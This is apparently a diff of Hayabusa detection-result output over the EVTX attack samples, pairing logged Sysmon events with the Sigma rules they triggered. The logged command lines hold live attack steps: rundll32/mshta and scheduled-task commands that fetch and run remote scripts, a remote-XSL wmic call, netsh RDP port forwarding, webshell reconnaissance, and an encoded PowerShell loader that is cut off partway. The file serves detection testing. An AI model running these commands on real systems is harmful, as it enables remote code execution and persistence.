+2019-05-21 09:35:07.870 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.0.153744822\2027949517"" -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 956 gpu  :  Path: C:\Program Files\Mozilla Firefox\firefox.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:08.279 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe""   :  Path: C:\Windows\System32\calc.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:08.728 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe""   :  Path: C:\Windows\System32\calc.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:08.728 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.6.1176946839\1268428683"" -childID 1 -isForBrowser -prefsHandle 1844 -prefMapHandle 1836 -prefsLen 1 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 1680 tab  :  Path: C:\Program Files\Mozilla Firefox\firefox.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:10.161 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.13.1464597065\1561502721"" -childID 2 -isForBrowser -prefsHandle 2432 -prefMapHandle 2436 -prefsLen 5401 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 2448 tab  :  Path: C:\Program Files\Mozilla Firefox\firefox.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:12.705 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.20.1502540827\1989220046"" -childID 3 -isForBrowser -prefsHandle 3032 -prefMapHandle 3056 -prefsLen 6207 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 3024 tab  :  Path: C:\Program Files\Mozilla Firefox\firefox.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-22 00:32:57.286 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe  /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true);  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:57.286 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe  javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true);  :  Path: C:\Windows\System32\rundll32.exe  :  User: IEWIN7\IEUser  :  Parent Command: cmd.exe  /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true);",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:57.867 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt  :  Path: C:\Windows\System32\mshta.exe  :  User: IEWIN7\IEUser  :  Parent Command: rundll32.exe  javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true);",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:59.769 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR ""mshta.exe https://hotelesms.com/Injection.txt"" /F   :  Path: C:\Windows\System32\schtasks.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:59.769 +09:00,IEWIN7,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:59.769 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 13:02:11.307 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:1600 CREDAT:275470 /prefetch:2",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_driveby_cve-2018-15982_sysmon_1_10.evtx
+2019-05-24 01:49:05.736 +09:00,IEWIN7,1,informational,Process Creation,"Command: wmic  process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl""  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
+2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
+2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
+2019-05-24 01:49:07.731 +09:00,IEWIN7,11,high,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
+2019-05-24 01:49:08.422 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: wmic  process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
+2019-05-24 01:50:44.582 +09:00,IEWIN7,1,informational,Process Creation,Command: wmiadap.exe /F /T /R  :  Path: C:\Windows\System32\wbem\WMIADAP.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
+2019-05-24 02:26:08.716 +09:00,IEWIN7,1,informational,Process Creation,"Command: msxsl.exe  c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat  :  Path: \\vboxsrv\HTools\msxsl.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx
+2019-05-24 02:26:08.716 +09:00,IEWIN7,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx
+2019-05-24 02:26:09.437 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: msxsl.exe  c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx
+2019-05-24 02:45:34.538 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx
+2019-05-24 02:46:04.671 +09:00,IEWIN7,1,informational,Process Creation,"Command: netsh  I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5  :  Path: C:\Windows\System32\netsh.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx
+2019-05-24 02:46:04.671 +09:00,IEWIN7,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx
+2019-05-24 02:46:04.671 +09:00,IEWIN7,1,high,Netsh RDP Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd_3389.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx
+2019-05-24 10:33:53.112 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\windows\system32\cmd.exe"" /c net user  :  Path: C:\Windows\System32\cmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-24 10:33:53.112 +09:00,IEWIN7,1,high,Shells Spawned by Web Servers,,rules/sigma/process_creation/win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-24 10:33:53.122 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-24 10:33:53.182 +09:00,IEWIN7,1,informational,Process Creation,"Command: net  user  :  Path: C:\Windows\System32\net.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""c:\windows\system32\cmd.exe"" /c net user",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-24 10:33:53.192 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\net1  user  :  Path: C:\Windows\System32\net1.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: net  user,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-26 13:01:42.385 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe""   :  Path: C:\Users\IEUser\Desktop\info.rar\jjs.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-26 13:01:42.966 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe""  :  Path: C:\Users\IEUser\Desktop\info.rar\jjs.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-26 13:01:43.567 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\svchost.exe  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-26 13:01:43.567 +09:00,IEWIN7,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-26 13:01:43.567 +09:00,IEWIN7,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-26 13:01:43.567 +09:00,IEWIN7,1,critical,Suspect Svchost Activity,,rules/sigma/process_creation/win_susp_svchost_no_cli.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-27 00:47:56.667 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\System32\notepad.exe  :  Path: C:\Windows\System32\notepad.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipmb9da32d5-aa43-42fc-aeea-0cc226e10973 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:56.667 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:56.727 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:57.628 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:48:00.752 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\notepad.exe""  :  Path: C:\Windows\System32\notepad.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\System32\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:48:01.864 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 10:28:42.711 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGw